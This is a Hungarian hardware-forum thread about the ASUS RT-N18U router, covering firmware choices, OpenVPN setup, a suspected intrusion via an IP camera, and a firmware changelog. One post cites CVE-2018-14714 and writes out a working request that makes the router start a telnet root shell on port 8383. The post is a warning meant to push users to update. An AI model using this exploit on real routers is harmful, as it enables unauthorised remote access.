-
PROHARDVER!
600 Mbps-os tempót ígér 2,4 GHz-en az ASUS RT-N18U High Power routere
Új hozzászólás Aktív témák
-
gabro0
őstag
válasz
akisbandi
#13395
üzenetére
Ha biztonságot szeretnél használj újabb/más fw-t. A HGG-ben én nem bíznék már meg, csomó sérülékenységet találtak az AsusWRT-ben azóta.
CVE-2018-14714:
<router IP>/appGet.cgi?hook=load_script("../usr/sbin/telnetd+-l+/bin/sh+-p+8383")
Ezzel pl. nyit egy telnet csatornát a 8383 porton, amin azt csinál amit akar
Nem tudom kell-e login hozzá, de XSS is bőven akad, szóval könnyen megszerezheti a passt is. -
akisbandi
aktív tag
válasz
MaCS_70
#13394
üzenetére
Újabb fejlemények.
HGG 380.65.8 a verzió.
Újracsatlakoztam a routeren a netre, kapott új IP-t, megváltoztattam a noip-s hostname-t, noip-n és a routeren is jelszót cseréltem, majd a VPN-t kikapcsoltam.
Továbbra is próbálnak csatlakozni és az orosz barátunk a 37.x.x.x IP-ről be is jön és próbál bejutni a kamerába - az is kapott új jelszót.
Amúgy még lóg a routeren és kifelé kommunikál egy banki kártyás terminál és egy androidos samsung galaxy, semmi más
-
Nekem is furcsának tűnik, hogy az OpenVPN-t törték volna fel, mivel az hivatalosan biztonságosnak számít.
Valószínűtlen, hogy pont egy érdektelen magánfelhasználónál vessenek be világra szóló nehéztüzérséget.A 128 bit mondjuk már kissé idejétmúlt, de gyakorlatban még simán elegendő védelmet nyújt.
Úgyhogy vagy valami nagyon félrement az OVPN konfigurálásakor (ami eléggé valószínűtlen, mivel már az alapbeállítások is megadják azt a biztonságot, amit jó ok nélkül senki sem akar feltörni), vagy máshol volt a rés -- és a kamera erre eléggé kézenfekvő megoldást jelent, még ha nem is feltétlenül mutatja meg befelé.
MaCS
-
akisbandi
aktív tag
-
htc07
addikt
válasz
akisbandi
#13391
üzenetére
a kamera nem elérhető kívülről vpn nélkül? szerintem csak megtalálták a portját, és azon próbálgatnak belépni, nem hiszem, hogy a vpn-en jutottak volna be.
akkor már valószínűbbnek tartom, hogy valami más exploittal jutottak be a routerbe, vagy kulcs helyett valami gyenge user+pass kombóval lépsz be.
-
akisbandi
aktív tag
Sziasztok,
OpenVPN konfigurálásban kérnék tanácsot.
HGG fut a routeren, openvpn alapbeállításokkal konfigurálva, telenor stickkel csatlakozik a netre. Egy noip-s hostname segítségvel érem el kívülről a routert, amin egyébként egy kamera van. Időnként ránézek, de amúgy mozgásra e-maileket küld, nagyjából ennyi a funkciója.
Aztán most kaptam egy e-mait a "kamerától", illegeal login tartalommal. A kamera alap portja sincs alapon a kezdetektől fogva, erős jelszó van, véges jelszópróbálkozás - nagyjából ennyi.A kérdés az, hogy miként tehetem biztonságosabbá a VPN kapcsolatot (azt hiszem alapból 128 bit-es a titkosítás a HGG-n), mert valahogy sikerült bejutni a routerre az orosz kalózoknak. A kamerát még nem sikerült meghekkelni, de gondolom az is csak idő kérdése.
-
#13390
Ybear
tag
Armagedown
#13388
Ybear
tag
válasz
Armagedown
#13388
üzenetére
Szia!
[Itt részletezve] -
#13388
Armagedown
őstag
Armagedown
őstag
A router hány torrentet képes kezelni a Download Masterel?A példa kedvéért mindegyik valamilyen 2 GB körüli Linux image.
Jobb volna erre inkabb valami cfw?Azzal hányat volna képes kezelni?
Ha szeretnék port forwardingot, akkor simán nyissak egy portot a 192.168.0.1re, nem volna ebből boztonsági gond? -
#13386
ArthurShelby
addikt
Xenophobermn
#13383
ArthurShelby
addikt
válasz
Xenophobermn
#13383
üzenetére
Az nem tudom mennyire baj, de tuti más ip tartományba lesztek.
Alapertelmezetten 192.168.1.1 és 10.0
0.8 ha jól emlékszem így fejből. -
#13384
htc07
addikt
Xenophobermn
#13383
htc07
addikt
válasz
Xenophobermn
#13383
üzenetére
Ha a VPN szervert TUN helyett TAP-ra allitod, akkor biztosan menni fog, mert az alacsonyabb szintu tunnelt hoz letre.
Eleg, ha egy openvpn klienssel csatlakozik a te asus routereden levo openvpn szerverhez (vagy te az ovehez), es utana tudtok is jatszani.
-
#13383
Xenophobermn
csendes tag
Xenophobermn
csendes tag
Sziasztok!
Haverral próbáltunk LAN-on játszani. Meghozzá mindketten otthonról. Mondom van openVPN a routeren. Csatlakozott ahogy kell a VPN szerverhez az ASUS roterrel, pingetni tudtam is a 10.0.0.8-as IP címét. Indítjuk a játékot, de semmi. (windows 10, tűzfal ki, vírusírtó ki, de úgy se) Többet nem is nagyon próbálkoztunk.
Gondoltam rákerdezek ha van még erre valaki, hogy így játszani sikerült másr valakinek LAN módba? -
gabro0
őstag
válasz
junior11
#13379
üzenetére
Megnyitja, csak le kell nyitnod a menüt és továbblépned.
----
Új gzenux béta elérhető [link]
384.13-beta1
Changelog for RT-N18U:
- NEW: Merge GPL 384_81116 from asuswrt-merlin.
- NEW: Allow switching LED stealth mode with WPS button.
To enable this feature, change the WPS button function on
System page.
- REMOVED: Unused Main_AdmStatus_Content page
- CHANGED: Replace syslogd backend service with rsyslogd.
- CHANGED: Use unified ping list on System, DualWAN and
NetworkAnalysis pages.
This also fixed the ping item "Яндекс" and "ВКонтакте"
are not shown correctly on System page.
- CHANGED: Disable ProtectionSrv service by default.
- FIXED: Invalid USB mode option on System page.
- FIXED: Invalid message log level option on General Log page.
- FIXED: Temperature Info may not refresh on IE8.
Changelog from Asuswrt-Merlin:
- NEW: Implement option to prevent Firefox's automatic usage of DoH.
By default, this will only apply if you have DNSPrivacy
enabled, or if you have DNSFilter enabled with a global
filter, to ensure that Firefox will not bypass either of
these. You can also have this override applied all the
time, or completely disable it.
- NEW: Added "split" busybox applet.
- NEW: Added IPv6 support to Network Analysis webui
- UPDATED: miniupnpd 20190824
- UPDATED: dnsmasq 2.80-93-g6ebdc95 (themiron)
- UPDATED: OpenSSL 1.0.2 to 1.0.2t (themiron)
- UPDATED: OpenSSL 1.1.1 to 1.1.1d (themiron)
- UPDATED: Curl 7.66.0
- UPDATED: nano 4.4
- UPDATED: OpenVPN 2.4.8
- UPDATED: OUI database to 2018-08-17 version
- UPDATED: CA root certificates to October 9th 2019
- CHANGED: Made webui SSL certificate generation compliant with
IOS 13 and MacOS 10.15 new requirements.
- CHANGED: Rewrote the faketc script used to inject Codel into
Adaptive QoS as a C program for improved performance.
- CHANGED: IPv6 firewall now accepts empty values for local IP
(which means any local IP).
- FIXED: Webui wouldn't notify when running dangerously low on
free nvram (feature was lost at some point in the past)
- FIXED: Custom clientlist would be wiped if stopping an
OpenVPN server instance.
- FIXED: Incorrect detection of EUI64 addresses on the IPv6
firewall (would prevent using ::/0 for instance).
- FIXED: EUI64 support missing while in Load Balancing or
using Multicast IPTV. -
#13376
junior11
veterán
Gubek-Einste
#13375
junior11
veterán
válasz
Gubek-Einste
#13375
üzenetére
Https-re átállítva korábban volt panasz, hogy nem volt elérhető az admin felület, mókolás után sem működött rendesen. Jelenleg nem tudom, mi a helyzet, ha vki lenne olyan szíves, leírná, hogyan kell beállítani. Köszi.
-
#13375
Gubek-Einste
titán
junior11
#13374
-
efi99
őstag
Nyári időszámítás kezdetét miért nem tudom megváltoztatni?
Adminisztráció - rendszer - DST időzóna változásának kezdete
Átírom, alkalmaz, erre reklamál fent e bejelentkezési névnél, hogy Ilyen fiók már létezik. Hogy jön ez ide?
A másik meg, hogy ezt most akkor nekünk kell figyelgetni, hogy az utolsó vasárnap az márciusban (meg októberben) a 4. vagy az 5. lesz-e éppen ? -
AlienM
tag
Az se mindegy, hogy folyamatos felvételt akarsz, vagy csak a mozgásokat akarnád menteni?
Folyamatosra a wifi szerintem nem annyira jó, a másik kérdés, hogy több szálon a router mennyit bír írni a disc-re (MB/s), elég-e, ha sok megapixeles, nagy bitrate-es mentést szeretnél...
Nekem poe-val van megoldva 4 kamera. -
#13371
Gubek-Einste
titán
eJeti
#13370
Első körben arra, hogy a kamera tudja Samba felvétel mert ha nem akkor nem fog menni a router-re kötött HDD-re a mentés.
Mivel kell a tápellátás a kamerának így vagy napelemesen oldod meg vagy kábelen, ebből a PoE lenne inkább ajánlott de akkor meg nincsen értelme a wifi-s létnek.
Inkább valamilyen kamerás topikban érdeklődjél. -
#13367
Tesztelo.hu
senior tag
Tesztelo.hu
senior tag
Wireless Ethernet Bridge módban használom a routeremet, azaz Wifin keresztül van internetelérés, azt "osztja le" a LAN portokra. Meg tudom-e valahogyan csinálni, hogy egy backup 4G stickkel automatikusan átváltson a router a 4G stickre, ha Wifin megszakad az internetkapcsolat? A stick megvan, Huawei E3372, amit kezel is a router a Tomatóval, megy is rajta keresztül a netelérés, de azt hogyan állítsam be, hogy alapból a Wifit használja netelérésre, és ha az nincs, automatikusan váltson át a stickre? A gyári fw DualWan módja is csak router módban érhető el sajnos.
-
gabro0
őstag
válasz
MaCS_70
#13360
üzenetére
Mi a gond a Gzenux verzóval?
(#13321) Intruder2k5: Én arra gondoltam, hogy CTF nélkül nem tud 300Mb feletti forgalmat bonyolítani, mert elfogy a CPU. Valószínűleg nem ennyi, de valami ilyesmi érték rémlik korábbról. DDWRT kapcsán volt róla szó.
Ami az SSH klienst illeti, persze, nem hit téríteni akartam, csak felhívni a figyelmet egy egyszerű beépített alternatívára. A működése a Linux-béli ssh klienshez hasonló, vagyis itt is van lehetőség a konfiguráció mentésére. Találtam is egy szemléltető videót [link].
-
-
locon70
csendes tag
Sziasztok felraktam asus rt n18 u routerra ezt a merlint https://gzenux.github.io/asuswrt-rtn18u/ de a download master nem akar életre kelni többször reseteltem hardresetelm előtte nem működik valami ötlet?
-
-
Peltár
aktív tag
válasz
MaCS_70
#13354
üzenetére
Itt ebben az esetben annyi volt az igaz, hogy minden egy gyártótól lett megvéve,
számítógépes "szakboltban" a probléma és az általunk kigondolt megoldás ismertetése, véleményeztetése után, a kompatibilis eszközöket beszerezték, majd én üzemelhettem be.
Persze a szükséges minimális és nem optimális anyagi ráfordítás mellett. -
válasz
Peltár
#13353
üzenetére
Ez így érthető, a Te esetedben a wifi hatótávjának volt abszolút prioritása, és azt az irányított antenna meg is oldotta.
A másik oldalon viszont teljesen megszűnt a beamforming, a szoftvernek fogalma sem volt arról, hogy hová lett egy antennája a vételi körzet nagyobb részéből, nem működtek az általa kezelni vélt hullámeltolódások.Nem véletlen, hogy az ehhez hasonló helyzetekre dedikált eszközpárt ír elő a kánon, ami nem omlasztja össze az alap wifis hálózat egyensúlyát.
De nyilván a felhasználói igények és vélemények döntenek a műszaki korrektség felett, ami nem cél, hanem eszköz. Nálatok bevált, ez a lényeg.
MaCS
-
Peltár
aktív tag
válasz
MaCS_70
#13352
üzenetére
Persze igazad van, azt nem lehet a gyártóktól elvárni hogy kitalálják te hol fogod használni az
adott eszközt, mennyi fal, távolság, a falak típusa pl sima tégla, vagy vasbeton, vagy éppen könnyű szerkezetes alumínium építmény. Milyen egyéb zajforrás, zavarás van.
Az antenna cserét én saját tapasztalat alapján írom, eddig három eszköznek cseréltem antennát és eddig bevált. Ez városi régi bérház, óvóhely is egyben, 20m távolság közé 2x 80m téglafal, a fal túloldalán 2m széles nagyfesz szekrény fémből, + egy 10cm válaszfal, a fogadó oldalon netbook, + okostelefon. A netbook nem tudott
rendesen adni a router felé, ezért kapott egy USB-cserélhető antennás Wi-Fi-t ennek az antennáját (2,4 GHz-es) cseréltem egy külső talpas kb 30cm-es szörnyre, amivel nyertem , 5dBi, a router kapott 3db gyári erősebb antennát, ami szintén segített, de főnök többet akart,
így az egyik antenna helyére raktunk egy gyári kb 20-30cm átmérőjű iránysugárzó antennát
ezután nem volt már panasz sem az adott helységben ahol a routert használták, sem ott, ahol a netbook volt, vagy három évig így ment, amíg az üzlet eladásra nem került. Én simán átvittem volna utp kábelt, de egyrészt műemlék védettségű épület, másrészt a főnököm nem akarta a kábelezést, inkább költött antennákra, meg utoljára egy jeltovábbítóra az új okos telefon miatt, valami Samu volt nagyon gyenge kimenő teljesítménnyel. Én csak mindig méricskéltem mivel mit nyerünk teljesítményben, de a gyakorlatban bevált, főnökömet meg csak ez érdekelte, a kudarc nála nem volt alternatíva. (vastagok a falak, meg egyéb nem érdekelte, oldjam meg)
--------------- -
válasz
Peltár
#13346
üzenetére
Nem igazán jók ezek a hasonlatok. A wifi sebességadataiba nem lehet belekalkulálni a rendszeren kívüli átviteli közeg paramétereit. Már akár 1 mm rádiózási távolság is járhat kiszámíthatatlan következményekkel, ezért súlyos elvi hiba lenne nem az adapter belső paramétereit adni meg.
Az antennacserével meg csak óvatosan: mindegyikantennának egy helyen és azonosnak kell lennie. Amúgy meg nem véletlenül vannak adott specifikációjú antennák egy eszközön. Ritkán javít a teljesítményükön a csere.
MaCS
-
Nem tudom kell-e login hozzá, de XSS is bőven akad, szóval könnyen megszerezheti a passt is.
Új hozzászólás Aktív témák
Hirdetés
ph A TurboQAM technológia révén az N szabvány maximumát kínálja a termék.
- ASUS TUF GAMING B760M-BTF WIFI D4 (Wifis DDR4 alaplap)
- XBOX Series S 512GB, 2026.12.10-ig gyári garanciával, dobozában, makulátlan állapotban eladó!
- 8/16BIT ISA Kártyák
- Csere-Beszámítás! RGB Számítógép PC játékra! R5 5600X / RTX 3060Ti 8GB / 32GB DDR4 / 500GB SSD
- 16BIT ISA Kártya 286 proci + Cirrus Logic Chip
- Így lehet neked Teljes Magyar Logitech Craft Billentyűzet
- ÁRGARANCIA!Épített KomPhone Ryzen 5 7600X 32/64GB RAM RTX 5070 12GB GAMER PC termékbeszámítással
- LG 25GR75FG - E-Sport Monitor - FHD 360Hz 1ms - NVIDIA Reflex + G-sync - AMD FreeSync - HDR 400
- Apple iPhone 13 128GB, Kártyafüggetlen, 1 Év Garanciával
- Telefon felvásárlás!! Apple iPhone 16, Apple iPhone 16e, Apple iPhone 16 Plus, Apple iPhone 16 Pro
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest